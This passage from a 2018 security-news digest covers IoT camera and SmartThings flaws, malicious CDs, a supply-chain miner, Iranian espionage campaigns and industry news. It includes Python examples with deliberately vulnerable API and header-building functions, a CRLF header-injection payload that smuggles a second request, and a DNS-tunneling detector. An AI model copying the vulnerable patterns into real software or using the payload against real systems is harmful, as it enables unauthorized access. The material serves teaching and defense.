The experts explained that Swann quickly fixed the issue, but they speculated that Ozvision was already aware of it.

“Ozvision already knew about the vulnerability, as Swann had informed them. The Swann customer camera cloud environment had quickly been fixed. Swann took swift action to fix the flaw and had a constructive dialogue with us.” continues the post.

“We suspect they knew about this issue for about nine months, and only fixed it when pressured by Swann; and we are confident the vulnerability was present in at least one other major camera brand to which they provide a cloud service. Further, they initially deflected direct questions about the issue back to Swann.”

How to discover serial numbers of existing cameras?

The serial number is composed of the string ‘swn’ plus 9 hex characters. The researcher Vangelis Stykas (@evstykas, of Tapplock API vulnerability fame) analyzed the API and discovered that it was possible to enumerate them with the following requests:

1.1/osn/deviceIsOwned

1.1/osn/AccountAddDevice – this throws an error if the camera is already paired, which means that it is possible to enumerate the entire keyspace in search of existing cameras.

“We believe the keyspace could be fully enumerated in as little as 3 days, given a distributed set of concurrent requests to the API.” concluded the researchers.

“So, one could now access arbitrary cameras.”
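Both findings above come down to one design error: the serial number is treated as a credential. The mobile app is authenticated, but nothing checks that the serial it asks about belongs to the logged-in account, and the pairing endpoint answers differently for paired and unpaired serials, so the whole `swn` + 9-hex-character space can be walked. The following Python is an added example, not Swann's, Ozvision's or Pen Test Partners' code: it places a vulnerable and a hardened version of each call side by side. The endpoint names and the serial format come from the article; the account store, session tokens, pairing codes and error classes are constructed.

```python
"""Device API authorization keyed by serial number: the vulnerable and the
hardened shape of the calls described in the article.

Added example, not Swann's, Ozvision's or Pen Test Partners' code. The
endpoint names (userListAssets, deviceWakeup, AccountAddDevice) and the
serial format 'swn' + 9 hex characters come from the article; the account
store, session tokens, pairing codes and error behaviour are constructed.
"""
import re
import secrets
from typing import Callable, Dict, List, Type

SERIAL_RE = re.compile(r"^swn[0-9a-f]{9}$")

# Constructed back-end state.
SESSIONS: Dict[str, str] = {"tok-alice": "alice", "tok-bob": "bob"}
DEVICES: Dict[str, str] = {"swn0a1b2c3d4": "alice", "swn9f8e7d6c5": "bob"}  # serial -> owner
PAIRING_CODES: Dict[str, str] = {  # printed on the device, not derivable from the serial
    "swn0a1b2c3d4": "K7P2-QX91",
    "swn9f8e7d6c5": "M3RT-08ZA",
    "swn5e5e5e5e5": "ZZ10-44QP",  # manufactured but not yet paired
}


class Forbidden(Exception): pass
class NotFound(Exception): pass
class AlreadyPaired(Exception): pass
class WrongCode(Exception): pass
class PairingFailed(Exception): pass


def user_list_assets(token: str) -> List[str]:
    """Cameras belonging to the authenticated account."""
    account = SESSIONS[token]
    return sorted(serial for serial, owner in DEVICES.items() if owner == account)


def device_wakeup_vulnerable(token: str, serial: str) -> str:
    """Authenticates the caller but trusts the serial it sends: swapping the
    serial in the client request reaches someone else's camera."""
    SESSIONS[token]
    if serial not in DEVICES:
        raise NotFound
    return f"stream:{serial}"


def device_wakeup_hardened(token: str, serial: str) -> str:
    """Resolve ownership server-side; the serial is a lookup key, not a proof
    of ownership. Unknown and not-owned serials get the same answer."""
    account = SESSIONS[token]
    if not SERIAL_RE.match(serial) or DEVICES.get(serial) != account:
        raise Forbidden
    return f"stream:{serial}"


def account_add_device_vulnerable(token: str, serial: str, code: str) -> str:
    """Distinct errors for 'already paired', 'unknown' and 'wrong code' turn the
    pairing call into an existence oracle over the serial space."""
    account = SESSIONS[token]
    if serial in DEVICES:
        raise AlreadyPaired
    if serial not in PAIRING_CODES:
        raise NotFound
    if PAIRING_CODES[serial] != code:
        raise WrongCode
    DEVICES[serial] = account
    return "paired"


def account_add_device_hardened(token: str, serial: str, code: str) -> str:
    """One failure response regardless of cause, and pairing requires a secret
    that is not guessable from the serial."""
    account = SESSIONS[token]
    well_formed = bool(SERIAL_RE.match(serial))
    unpaired = serial not in DEVICES
    code_ok = secrets.compare_digest(PAIRING_CODES.get(serial, ""), code)
    if not (well_formed and unpaired and code_ok):
        raise PairingFailed
    DEVICES[serial] = account
    return "paired"


def requests_per_second_to_enumerate(days: float = 3, hex_chars: int = 9) -> float:
    """Sustained request rate needed to cover every 'swn' serial in `days`."""
    return 16 ** hex_chars / (days * 86400)


def raises(exc: Type[BaseException], fn: Callable, *args) -> bool:
    """True when fn(*args) raises exc; used to put the two behaviours side by side."""
    try:
        fn(*args)
    except exc:
        return True
    return False
```

`requests_per_second_to_enumerate()` puts the researchers' three-day estimate in perspective: roughly 265,000 requests per second across the whole space, which is why the hardened pairing call gives one uniform failure and why rate limiting per account and per source is the complementary control rather than a substitute for the authorization check.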


Mysterious snail mail from China sent to US agencies includes Malware-Laden CD
30.7.2018 securityaffairs Virus

Several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden CDs.
Crooks and cyberspies attempt to exploit any attack vector to compromise the targeted computers, and the case we are going to discuss demonstrates it.

The popular security expert Brian Krebs reported that several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden compact discs (CDs).

The list of recipients that received the malicious snail mail includes State Archives, State Historical Societies, and a State Department of Cultural Affairs.

KrebsOnSecurity reported having learned that the strange mail was apparently sent from China.

“This particular ruse, while crude and simplistic, preys on the curiosity of recipients who may be enticed into popping the CD into a computer. According to a non-public alert shared with state and local government agencies by the Multi-State Information Sharing and Analysis Center (MS-ISAC), the scam arrives in a Chinese postmarked envelope and includes a “confusingly worded typed letter with occasional Chinese characters.”” reads the post published by Brian Krebs.

Snail Mail Malware-Laden CD

The attackers clearly attempt to exploit the curiosity of potential victims, who may be enticed into viewing the content of the CD.

According to the experts at MS-ISAC who analyzed the CDs, the discs contain Mandarin-language Microsoft Word documents, some of which include malicious scripts.

All the letters received by the organizations appear to be addressed specifically to them.

“It’s not clear if anyone at these agencies was tricked into actually inserting the CD into a government computer.” continues Krebs.

“I’m sure many readers could think of clever ways that this apparent mail-based phishing campaign could be made more effective or believable, such as including tiny USB drives instead of CDs, or at least a more personalized letter that doesn’t look like it was crafted by someone without a mastery of the English language.”

A similar attack technique has already been observed in the wild: in September 2016 the police in the Australian state of Victoria warned the local population about malware-laden USB drives left in letterboxes.

In August 2016, at Black Hat USA, security researcher Elie Bursztein demonstrated the dangers of found USB drives and how to create a realistic one.

The expert dropped 297 USB drives at six different locations on the University of Illinois Urbana-Champaign campus; the devices were able to take over the PC of any unaware user who found the key.

48 percent of the USB drives were picked up by passers-by and plugged into a computer, and the unaware users also tried to open the files within.

Social engineering attacks demonstrate that humans are the weakest link in the security chain, and attacks leveraging malware-laden CDs exploit bad habits.


Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs Vulnerability IoT

Cisco Talos researchers found tens of flaws in the Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in the Samsung SmartThings Hub controller that potentially expose any supported third-party smart home devices to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that can be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

Access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and to perform unauthorized activities.

The Samsung SmartThings Hub runs Linux-based firmware and communicates with IoT devices over the Zigbee, Z-Wave and Bluetooth wireless standards.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains; only one of them yields remote code execution (RCE) without prior authentication.

RCE Chain – CVE-2018-3911

The unauthenticated RCE chain starts from an exploitable HTTP header injection bug in the communications (over port 39500) between the hub and the remote servers it talks to. By sending specially crafted HTTP requests to a vulnerable device, a network attacker can inject requests into the hub’s “video-core” HTTP server process.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.
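To make the bug class concrete, here is an added illustration of HTTP header injection (example code written for this page; it is not Talos’s proof of concept and not the hub’s code). A service takes a string from a JSON message and copies it into a header of an outbound HTTP request. If the string may contain CR/LF, the attacker terminates the header, appends headers of their own and even a second request line, which is what “injecting HTTP requests into the process” means. The hardened builder rejects any value that is not short, printable ASCII. The message bodies, header names and the `upstream.invalid` host are constructed for the example.

```python
import json

# Constructed sample messages (not the hub's real protocol): a JSON field
# that the service later copies into an outbound HTTP request header.
BENIGN_BODY = '{"session": "abc123"}'
# This message embeds CR/LF as JSON escapes (decoded by json.loads into real
# control characters), an extra header, and a complete second request line.
INJECTED_BODY = (
    '{"session": "abc123\\r\\nX-Injected: 1\\r\\n\\r\\n'
    'GET /admin HTTP/1.1\\r\\nHost: upstream.invalid"}'
)


class HeaderInjectionError(ValueError):
    """Raised by the hardened builder when a header value is unsafe."""


def _format_request(session: str) -> bytes:
    """Serialize the outbound request; the session value lands in a header."""
    request = (
        "POST /api/status HTTP/1.1\r\n"
        "Host: upstream.invalid\r\n"
        f"X-Session: {session}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return request.encode("utf-8")


def build_request_vulnerable(body: str) -> bytes:
    """Vulnerable pattern: the decoded JSON value goes straight into a header."""
    return _format_request(json.loads(body)["session"])


def is_safe_header_value(value: object, max_len: int = 64) -> bool:
    """Accept only short, printable ASCII: no CR, LF, NUL or other controls."""
    return (
        isinstance(value, str)
        and 0 < len(value) <= max_len
        and value.isascii()
        and value.isprintable()
    )


def build_request_hardened(body: str) -> bytes:
    """Hardened pattern: validate the value before it becomes header bytes."""
    session = json.loads(body)["session"]
    if not is_safe_header_value(session):
        raise HeaderInjectionError("unsafe characters in session value")
    return _format_request(session)


def count_request_lines(raw: bytes) -> int:
    """How many HTTP request lines an upstream parser would see in the bytes."""
    return sum(1 for line in raw.split(b"\r\n") if line.endswith(b" HTTP/1.1"))


def hardened_rejects(body: str) -> bool:
    try:
        build_request_hardened(body)
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY)):
        raw = build_request_vulnerable(body)
        print(f"{label}: vulnerable builder emits {count_request_lines(raw)} "
              f"request line(s); hardened builder rejects: {hardened_rejects(body)}")
```

The vulnerable builder turns the second message into two requests on the wire; the hardened one refuses it. Rejecting control characters at the point where untrusted data becomes protocol bytes is the generic fix, whatever the surrounding JSON parser does.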


Other chains

The other chains identified by the researchers can only be exploited by an authenticated attacker.

The first of these achieves remote code execution starting from CVE-2018-3879, which allows an authenticated attacker to execute SQL queries against a database running on the device.

Chaining this flaw with a series of memory corruption vulnerabilities in the hub (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 through CVE-2018-3917, and CVE-2018-3919) makes it possible to execute arbitrary code on the device.

The experts highlighted that CVE-2018-3879 is also the first link of the final chain, which leaks information remotely: the flaw can be used to create an empty file anywhere on the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process to crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis published by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaws, and the security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.


Microsoft Uncovers Multi-Tier Supply Chain Attack
28.7.2018 securityweek Attack

Microsoft has shared details of a new attack that attempted to spread crypto-mining malware to a large number of users by compromising the software supplying partner of an application developer.

The multi-tier attack relied on compromising the shared infrastructure between a PDF editor vendor and one of its partners that provided additional font packages for the application: the attackers aimed at the supply chain of the supply chain.

Limited in nature, Microsoft said the compromise appeared to be active between January and March 2018, and could have impacted six other vendors working with the font package provider.

Carried out silently, the attack initially looked like a typical infection and was automatically blocked, but the same infection pattern was then observed across a large number of machines.

Windows Defender ATP eventually alerted on nearly 70,000 instances of a coin-mining process masquerading as pagefile.sys, launched by a service named xbox-service.exe, Microsoft’s Windows Defender ATP Research team explains.

Microsoft's investigation revealed that a malicious installer package (MSI) was being downloaded by a PDF editor during installation, along with other legitimate installers. It was then discovered that the application vendor itself hadn’t been compromised, but the malicious package was served by a partner that creates and distributes additional font packages used by the app.

The attackers found a weakness in the interaction between the app vendor and its partner and leveraged it to hijack the installation chain of the MSI font packages, turning the PDF editor into an unwitting carrier of the malicious payload.

Microsoft discovered that the attackers had created a replica of the software partner’s infrastructure on their own server and copied and hosted all MSI files, including font packages, there. They only modified an Asian fonts package to add the malicious payload to it.

The attackers also managed to influence the download parameters used by the PDF app so as to point to their server, which resulted in the download of MSI font packages from the rogue server. Thus, users ended up installing the coin miner malware along with the legitimate application.

At device restart, the malicious MSI file would be replaced with the legitimate version. Microsoft also discovered hardcoded PDF app names in the malicious package and concluded that at least six additional vendors might have been targeted by the attackers.

“While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind,” Microsoft says.

Detected as Trojan:Win64/CoinMiner, the malicious miner would hide behind the name xbox-service.exe and use the infected machine’s resources to mine for Monero. The malware also attempts to prevent remote cleaning and remediation by blocking communication with the update servers of certain PDF apps.

The threat also hinted at browser scripts as an alternative form of coin mining, but it’s unclear whether this was a secondary plan or work in progress.

“This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources,” Microsoft says.

A CrowdStrike report published earlier this week highlighted the increasing number of cyberattacks targeting the software supply chain. Some of the largest such incidents include the NotPetya and CCleaner incidents last year, which impacted millions.


Iranian Hackers Use QUADAGENT Backdoor in Recent Attacks
28.7.2018 securityweek CyberSpy

A series of recent attacks attributed to an Iran-linked cyber-espionage group delivered a PowerShell backdoor onto compromised machines, Palo Alto Networks has discovered.

The attacks, observed between May and June 2018, were attributed to the OilRig group, which is also known as APT34 and Helix Kitten. Active since around 2015, the actor was seen using two new backdoors (RGDoor and OopsIE) earlier this year, as well as a new data exfiltration technique.

Aimed at a technology services provider and a government entity in the Middle East, the new attacks were “made to appear to have originated from other entities in the same country” and employed the QUADAGENT backdoor, Palo Alto Networks reveals.

Both the backdoor and other attack artifacts have been previously associated with the OilRig group.

The samples were nearly identical to each other, but featured different command and control (C&C) servers and randomized obfuscation (performed with the open-source toolkit called Invoke-Obfuscation).

Between May and June, the actor launched three attacks, each involving a spear-phishing email that appeared to originate from a government agency based in the Middle East. The sending account was likely compromised via credential theft.

The first two attack waves (aimed at a technology services provider) targeted email addresses that were not easily discoverable via search engines. The emails carried an attached executable (a .bat script converted to .exe) designed to install and run the QUADAGENT backdoor.

The dropper would run silently, write the backdoor to disk, create a scheduled task for persistence, and then execute the payload. The backdoor used rdppath[.]com as its C&C and attempted to reach it over HTTPS first, falling back to HTTP and then to DNS tunneling.
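The fallback order above matters for defenders: when HTTPS and HTTP are blocked at the egress proxy, the beacon moves to DNS, which most networks let through unfiltered. As an added example (written for this page; it is not Palo Alto Networks’ code and does not describe QUADAGENT’s actual encoding), the following Python scores resolver log lines for the trace DNS tunneling leaves behind: many unique, long, high-entropy subdomains under a single registered domain, often in record types that carry more data than an A record. The log lines are constructed (rdppath.com is used only because the article names it), and the log format, the thresholds and the two-label registered-domain heuristic are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines (not real telemetry). Host 10.0.0.5 issues
# six unique, high-entropy TXT queries under rdppath.com, the C&C domain the
# article names; the example.com lines are ordinary traffic.
SAMPLE_LOG = """\
2018-06-04T10:00:01 10.0.0.5 query: q7x2mfh9k3vz8bwc4n1dpe6r.rdppath.com TXT
2018-06-04T10:00:02 10.0.0.5 query: a5t8yg2lo9ic3xw7zv1hmnr4.rdppath.com TXT
2018-06-04T10:00:02 10.0.0.5 query: www.example.com A
2018-06-04T10:00:03 10.0.0.5 query: 3bzp7ku1dm4ty9xq6fe2wlr8.rdppath.com TXT
2018-06-04T10:00:04 10.0.0.5 query: h8n2cq5vr3aj7kx1go6wy4zt.rdppath.com TXT
2018-06-04T10:00:04 10.0.0.7 query: mail.example.com A
2018-06-04T10:00:05 10.0.0.5 query: e4w9sk2bv7mr1hq6ycx3nd8p.rdppath.com TXT
2018-06-04T10:00:06 10.0.0.5 query: u6f1zg3tk8lx5pw2rq9hv4mc.rdppath.com TXT
"""

# Assumed log format: "<timestamp> <client-ip> query: <qname> <qtype>".
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) query: (?P<qname>\S+) (?P<qtype>\S+)$")

# Record types that can carry a larger downstream payload than an A record.
CARRIER_TYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores high, dictionary words low."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """(registered domain, subdomain) using the last two labels as the
    registered domain. Assumption: production code would consult the public
    suffix list (e.g. for co.uk). Returns None when there is no subdomain."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str) -> list:
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def find_tunnel_candidates(records, min_unique=5, min_entropy=3.5, min_mean_len=16):
    """Aggregate per registered domain and flag those whose subdomains are
    numerous, long and high-entropy (thresholds are assumed starting points)."""
    stats = defaultdict(lambda: {"subs": set(), "ent": [], "len": [],
                                 "carrier": 0, "total": 0, "srcs": set()})
    for r in records:
        parts = split_qname(r["qname"])
        if parts is None:
            continue
        domain, sub = parts
        d = stats[domain]
        d["subs"].add(sub)
        d["ent"].append(shannon_entropy(sub.replace(".", "")))
        d["len"].append(len(sub))
        d["total"] += 1
        d["srcs"].add(r["src"])
        if r["qtype"].upper() in CARRIER_TYPES:
            d["carrier"] += 1
    flagged = {}
    for domain, d in stats.items():
        mean_ent = sum(d["ent"]) / len(d["ent"])
        mean_len = sum(d["len"]) / len(d["len"])
        if len(d["subs"]) >= min_unique and mean_ent >= min_entropy and mean_len >= min_mean_len:
            flagged[domain] = {
                "unique_subdomains": len(d["subs"]),
                "mean_entropy": round(mean_ent, 2),
                "mean_subdomain_len": round(mean_len, 1),
                "carrier_type_ratio": round(d["carrier"] / d["total"], 2),
                "sources": sorted(d["srcs"]),
            }
    return flagged


if __name__ == "__main__":
    for domain, info in find_tunnel_candidates(parse_log(SAMPLE_LOG)).items():
        print(domain, info)
```

Only rdppath.com is flagged on the sample; example.com fails the uniqueness test. Baseline the thresholds against your own traffic first: CDNs and some anti-spam services legitimately generate many random-looking subdomains, so the carrier-type ratio and the number of distinct clients are useful tie-breakers.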

The third wave (against the government entity) also used a simple PE file attachment, but compiled using the Microsoft .NET Framework instead of being converted. The victim was served a fake error box when executing the malware, in an attempt to reduce suspicion. Once dropped and executed, the backdoor would connect to the C&C at cpuproc[.]com.

A further sample collected by Palo Alto Networks did not use a PE attachment but relied on a Word document containing a malicious macro for delivery. The document displayed a decoy image and asked the user to enable content, but showed no additional decoy content after execution.

The use of Word documents as a delivery mechanism has been associated with the threat actor before, and the delivery of QUADAGENT in this manner was previously documented by ClearSky Cyber Security. The sample ClearSky analyzed appears identical to the one used in the attacks against the technology services provider, Palo Alto Networks says.

“While [OilRig’s] delivery techniques are fairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they illustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough modifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different enough to bypass security controls,” the security firm concludes.


Iran-Linked 'Leafminer' Espionage Campaign Targets Middle East
28.7.2018 securityweek CyberSpy

A group of cyberspies believed to be operating out of Iran has targeted government and other types of organizations in the Middle East since at least early 2017, Symantec revealed on Wednesday.

According to the security firm, which tracks the threat actor as Leafminer, this is a previously undocumented campaign. Symantec has detected malware and tools associated with this group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries, but researchers uncovered a list – written in Iran’s Farsi language – of more than 800 targets whose systems were apparently scanned by the attackers. This list shows that the targeted countries also include the United Arab Emirates, Qatar, Bahrain, Egypt and Afghanistan.

A significant percentage of targets were in the financial, government and energy sectors, but several other industries were targeted as well.

Leafminer targets

Leafminer has used both custom-built malware and publicly available tools in its campaign. Its attack techniques include the use of compromised web servers as watering holes, scanning and exploitation of vulnerable network services, and dictionary attacks aimed at authentication services.

One of the servers used by Leafminer stored 112 files, including malware, tools and log files generated as a result of scans and post-compromise activities.

Some of the tools in Leafminer’s arsenal were linked to other groups with apparent ties to Iran. The hackers have also leveraged widely available tools and exploits, such as the Fuzzbunch exploitation framework leaked by the Shadow Brokers, which includes the infamous EternalBlue exploit.

Leafminer has also developed its own malware, including Trojan.Imecab and Backdoor.Sorgu. Sorgu provides the attackers remote access to compromised machines, while Imecab provides persistent access with a hardcoded password.

Another custom tool used by the threat actor is a modified version of the popular Mimikatz post-exploitation tool. The attackers attempt to avoid detection using a technique dubbed Process Doppelgänging, which researchers disclosed late last year. Symantec has also seen attempts to find systems vulnerable to Heartbleed attacks.

Leafminer also appears to be inspired by the Russia-linked Dragonfly group. A technique used by Dragonfly in watering hole attacks has also been spotted in the Leafminer campaign, researchers said.

Symantec pointed out that the group is “eager to learn from and capitalize on tools and techniques used by more advanced threat actors” and that it has been “tracking developments in the world of cyber security.”

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” Symantec said.


Google Announces New Security Tools for Cloud Customers
28.7.2018 securityweek Security

Google on Wednesday took the wraps off a broad range of tools to help cloud customers secure access to resources and better protect data and applications.

To improve security and deliver flexible access to business applications on user devices, Google has introduced context-aware access, which brings elements from BeyondCorp to Google Cloud.

With context-aware access, Google explains that organizations can “define and enforce granular access to GCP APIs, resources, G Suite, and third-party SaaS apps based on a user’s identity, location, and the context of their request.” This should improve security posture while reducing complexity for users, who can log in from anywhere and from any device.

The new capabilities are now available for select VPC Service Controls customers and should soon become available for those using Cloud Identity and Access Management (IAM), Cloud Identity-Aware Proxy (IAP), and Cloud Identity.

For increased protection against credential theft, Google announced Titan Security Key, “a FIDO security key that includes firmware developed by Google to verify its integrity.” Meant to protect users from the potentially damaging consequences of credential theft, Titan Security Keys are now available to Google Cloud customers and will soon arrive in Google Store.

Also revealed on Wednesday, Shielded VMs are designed to ensure that virtual machines have not been tampered with, and allow users to monitor and react to any change in a VM’s baseline or its current runtime state. Shielded VMs can be deployed from the GCP Marketplace.

According to Google, organizations running containerized workloads should also ensure that only trusted containers are deployed on Google Kubernetes Engine. For that, the Internet giant announced Binary Authorization, which enforces signature validation when container images are deployed.

Coming soon to beta, the tool allows for integration with existing CI/CD pipelines “to ensure images are properly built and tested prior to deployment” and can also be combined with Container Registry Vulnerability Scanning to detect vulnerable packages in Ubuntu, Debian and Alpine images before deployment.

Google also announced the beta availability of geo-based access control for Cloud Armor, a distributed denial of service (DDoS) and application defense service. The new capability allows organizations to control access to their services based on the geographic location of the client.

Cloud Armor can also be used for “whitelisting or blocking traffic based on IP addresses, deploying pre-built rules for SQL injection and cross-site scripting, and controlling traffic based on Layer 3-Layer 7 parameters of your choice.”

Cloud HSM, a managed cloud-hosted hardware security module (HSM) service coming soon in beta, allows customers to host encryption keys and perform cryptographic operations in FIPS 140-2 Level 3 certified HSMs, protecting sensitive workloads without having to manage an HSM cluster.

Courtesy of tight integration with Cloud Key Management Service (KMS), Cloud HSM makes it “simple to create and use keys that are generated and protected in hardware and use it with customer-managed encryption keys (CMEK) integrated services such as BigQuery, Google Compute Engine, Google Cloud Storage and DataProc,” Google says.

Earlier this year, the company launched Asylo, an open source framework and software development kit (SDK) meant to “protect the confidentiality and integrity of applications and data in a confidential computing environment.”

With Access Transparency, Google logs the activity of Google Cloud Platform administrators who access customer content. While GCP’s Cloud Audit Logs record the actions of the customer’s own administrators, they do not cover what the cloud provider’s Support or Engineering staff do when they are engaged; Access Transparency captures “near real-time logs of manual, targeted accesses by either support or engineering.”

Google also announced the investigation tool for G Suite customers, to help identify and act upon security issues within a domain. With this tool, admins can “conduct organization-wide searches across multiple data sources to see which files are being shared externally” and then perform bulk actions to restrict access to those files.

Google is also making it easier to move G Suite reporting and audit data from the Admin console to Google BigQuery. Furthermore, there are five new container security partner tools in Cloud Security Command Center to help users gain more insight into risks for containers running on Google Kubernetes Engine.

To meet customer requirements on where their data is stored, Google announced data regions for G Suite, a tool that allows G Suite Business and Enterprise customers “to designate the region in which primary data for select G Suite apps is stored when at rest—globally, in the U.S., or in Europe.”

To these, Google adds the Password Alert policy for Chrome Browser, which allows IT admins to “prevent their employees from reusing their corporate password on sites outside of the company’s control, helping guard against account compromise.”


Tenable Soars on IPO Day
28.7.2018 securityweek IT

Tenable Holdings, parent of veteran cybersecurity firm Tenable Network Security, celebrated its much-anticipated initial public offering (IPO) by raising roughly $250 million through the sale of 10.9 million shares at $23 per share.

The Columbia, Md.-based company began trading on the Nasdaq Global Select Market on Thursday under the ticker symbol “TENB”.

Shares of the company jumped more than 45% in early trading, reaching nearly $34 per share at the time of publishing and pushing the company’s market cap above $3 billion.

Founded in 2002, Tenable is known for its vulnerability scanners and software solutions that help find network security gaps. The company has more than 24,000 customers across 160 countries, including more than 50 percent of Fortune 500 companies and nearly 30 percent of Global 2000 firms.

In late 2017, Tenable announced a partnership with Siemens that aims to provide asset discovery and vulnerability management solutions for industrial networks.

Before going public, Tenable had raised more than $300 million, including $250 million in November 2015 and $50 million in September 2012.

Currently led by CEO Amit Yoran, former President of RSA and former National Cybersecurity Director at the U.S. Department of Homeland Security, Tenable had revenue of $187.7 million in 2017 and reported a net loss of $41 million for the year.


Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to three federal agencies asking them to work together on ending the government’s use of Adobe Flash.

Set to reach end-of-life in 2020, Adobe’s Flash Player continues to be plagued by critical vulnerabilities. Two zero-days in the software have been patched this year alone, but only after threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the plugin’s inherent security vulnerabilities as the main reasons to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) warned about the risks of using Flash nearly a decade ago, the letter also notes.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the bulk of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from this threat.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.


Dutch Court Sentences CoinVault Ransomware Authors to Community Service
28.7.2018 securityweek Ransomware

Two Dutch men were sentenced on Thursday to 240 hours of community service for creating and using the CoinVault ransomware.

The suspects are brothers, identified by Dutch media as Melvin and Dennis van den B., currently aged 25 and 21, respectively. They were both arrested in 2015 and accused of creating CoinVault, one of the first pieces of file-encrypting ransomware, and its successor, Bitcryptor.

Their trial took place on July 12, and they have now been sentenced to 240 hours of community service, the maximum community service sentence a Dutch court can impose. They have also been ordered to pay restitution to some of their victims.

Prosecutors had asked for three months in prison plus nine months suspended, in addition to community service. The sentence was reduced because the brothers cooperated with the police, including by helping victims recover their files, and have not committed any other crimes since their arrest in 2015.

The suspects were accused of hacking into computers and extorting nearly 1,300 individuals. However, Kaspersky Lab, which investigated CoinVault back in 2014 when the threat emerged and helped police identify the hackers, noted that there were actually roughly 14,000 victims worldwide.

A decryption tool for CoinVault is available through the NoMoreRansom initiative, but some victims have been unable to recover their files because implementation errors in the ransomware prevented decryption even with the correct keys.

The cybercriminals were identified by Dutch police after Kaspersky researchers found a first name in the malware code. According to some reports, the CoinVault authors also failed to hide their real IP address on at least one occasion.

“Cybercrime doesn’t pay,” said Kaspersky Lab researcher Jornt van der Wiel, commenting on the case. “If you become a victim of criminal or ransomware activity, keep your files and report the incident to the police. Never pay the ransom and be confident that not only will the decryption tool appear, but also that justice will triumph in regards to the criminals.”


Parasite HTTP RAT Packs Extensive Protection Mechanisms
28.7.2018 securityweek Virus

